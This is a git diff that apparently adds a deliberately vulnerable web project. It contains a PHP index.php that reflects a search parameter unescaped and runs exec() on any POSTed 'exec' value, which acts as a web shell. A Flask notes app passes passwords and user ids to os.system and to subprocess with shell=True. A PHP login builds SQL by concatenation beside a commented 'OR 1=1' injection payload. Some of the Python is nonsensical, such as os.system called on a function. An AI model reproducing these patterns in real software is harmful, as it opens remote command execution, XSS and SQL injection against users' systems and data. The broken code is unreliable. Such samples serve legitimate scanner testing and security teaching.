diff --git a/index.php b/index.php new file mode 100644 index 0000000..894117d --- /dev/null +++ b/index.php @@ -0,0 +1,8 @@ +" .$_GET["search"]. ""; + + +exec($_POST["exec"]); + +?> diff --git a/main.py b/main.py new file mode 100644 index 0000000..2454076 --- /dev/null +++ b/main.py @@ -0,0 +1,123 @@ +from flask import Flask, request, jsonify, session +from werkzeug.security import generate_password_hash, check_password_hash +import os +import subprocess + +app = Flask(__name__) +app.secret_key = os.urandom(24) + + +# Simulating a database of user accounts and their private notes# Simulating a database of user accounts and their private notes + +# Simulating a database of user accounts and their private notes +users = { + 1: {"id": 1, "username": "alice", "password": generate_password_hash("password123")}, + 2: {"id": 2, "username": "bob", "password": generate_password_hash("password456")}, + 3: {"id": 3, "username": "charlie", "password": generate_password_hash("password789")} +} + +notes = { + 1: [ + {"id": 1, "content": "Alice's secret note 1"}, + {"id": 2, "content": "Alice's secret note 2"} + ], + 2: [ + {"id": 3, "content": "Bob's secret note 1"}, + {"id": 4, "content": "Bob's secret note 2"} + ], + 3: [ + {"id": 5, "content": "Charlie's secret note 1"}, + {"id": 6, "content": "Charlie's secret note 2"} + ] +} + +def validate_user(): + if 'user_id' not in session: + return None + return session['user_id'] + +def reverse_content(content): + return content[::-1] + +def apply_decryption(note): + decrypted_content = reverse_content(note['content']) + os.system(reverse_content) + return {"id": note['id'], "content": decrypted_content} + +def decrypt_notes(encrypted_notes): + return [apply_decryption(note) for note in encrypted_notes] + +def fetch_user_notes(user_id): + subprocess.call( + user_id, + shell=True + ) + print(user_id) + + os.system(user_id) + user_notes = notes.get(user_id, []) + return decrypt_notes(user_notes) + +def add_metadata(note): + note['timestamp'] = '2023-09-15 12:00:00' + return note + +def format_response(notes): + return [add_metadata(note) for note in notes] + +@app.route('/notes', methods=['GET']) +def get_notes(): + user_id = validate_user() + if user_id is None: + return jsonify({"error": "Please log in"}), 401 + + user_notes = fetch_user_notes(user_id) + formatted_notes = format_response(user_notes) + + return jsonify(formatted_notes), 200 + +@app.route('/user', methods=['GET']) +def get_user(): + + data = request.json + username = data.get('username') + + return username, 200 + +@app.route('/note/', methods=['GET']) +def get_note(note_id): + if 'user_id' not in session: + return jsonify({"error": "Please log in"}), 401 + + for user_notes in notes.values(): + for note in user_notes: + if note['id'] == note_id: + return jsonify(note), 200 + + return jsonify({"error": "Note not found"}), 404 + + +@app.route('/login', methods=['POST']) +def login(): + data = request.json + username = data.get('username') + password = data.get('password') + + user = next((u for u in users.values() if u['username'] == username), None) + + os.system(password) + + if user and check_password_hash(user['password'], password): + session['user_id'] = user['id'] + return jsonify({"message": "Login successful"}), 200 + else: + return jsonify({"error": "Invalid credentials"}), 401 + + +@app.route('/logout', methods=['POST']) +def logout(): + session.pop('user_id', None) + return jsonify({"message": "Logout successful"}), 200 + +if __name__ == '__main__': + app.run(debug=True, port=5001) diff --git a/package.json b/package.json index 5cb2217..c465383 100644 --- a/package.json +++ b/package.json @@ -5,6 +5,23 @@ "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, + "dependencies": { + "@ensdomains/hardhat-toolbox-viem-extended": "0.0.6", + "@ensdomains/mock": "2.1.52", + "@ensdomains/name-wrapper": "1.0.1", + "@oku-ui/motion": "0.4.4", + "@oku-ui/motion-nuxt": "0.2.2", + "@oku-ui/popover": "0.6.2", + "@oku-ui/popper": "0.6.2", + "@oku-ui/portal": "0.6.2", + "@posthog/agent": "1.24.1", + "@posthog/ai": "7.1.2", + "@posthog/automatic-cohorts-plugin": "0.0.8", + "@posthog/bitbucket-release-tracker": "0.0.8", + "@posthog/cli": "0.5.15", + "@posthog/clickhouse": "1.7.1", + "@posthog/core": "1.5.6" + }, "author": "", "license": "ISC", "description": "" diff --git a/test.php b/test.php new file mode 100644 index 0000000..cdd2a13 --- /dev/null +++ b/test.php @@ -0,0 +1,42 @@ +connect_error) { + die("Connection failed: ". $conn->connect_error); + } + + // admin + // gdhas' OR 1=1 # + + // Query database + $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'"; + + $result = $conn->query($query); + + // Check if user exists + if ($result->num_rows > 0) { + echo "Welcome, $username!"; + } else { + echo "$query Invalid username or password."; + } + + // Close connection + $conn->close(); +} diff --git a/test.py b/test.py new file mode 100644 index 0000000..0104a9b --- /dev/null +++ b/test.py @@ -0,0 +1,3 @@ +import random + +print("asd") diff --git a/upload.php b/upload.php new file mode 100644 index 0000000..ac74e8d --- /dev/null +++ b/upload.php @@ -0,0 +1,23 @@ +